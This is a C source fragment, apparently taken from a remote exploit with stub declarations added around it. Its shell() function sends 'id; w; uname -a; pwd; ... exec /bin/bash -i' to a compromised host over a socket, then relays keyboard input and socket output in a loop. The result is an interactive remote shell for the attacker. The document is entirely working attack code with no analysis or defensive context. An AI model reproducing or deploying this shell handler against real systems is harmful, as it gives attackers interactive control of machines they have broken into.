
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int STDIN_FILENO ;
 int bzero (char*,int) ;
 int exit (int) ;
 int fflush (int ) ;
 int printf (char*,char*) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int ) ;
 int stdout ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void shell(int sd)
{
     int check;
     char cmd[]="id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash -i\n";
     char buf[2048];
            fd_set fd;

            bzero(buf,2048);
     send(sd,cmd,strlen(cmd),0);

     while(1) {

      fflush(stdout);
      FD_ZERO(&fd);
      FD_SET(sd,&fd);
      FD_SET(STDIN_FILENO,&fd);
      select(sd+1,&fd,((void*)0),((void*)0),((void*)0));

      if(FD_ISSET(sd,&fd)) {
       if((check=read(sd,buf,2048))<=0)
        exit(1);

   buf[check]=0;
   printf("%s",buf);
      }

      if(FD_ISSET(STDIN_FILENO,&fd)) {
       if((check=read(STDIN_FILENO,buf,2048))>0) {
           buf[check]=0;
    write(sd,buf,check);
       }
      }
     }
     return;
}
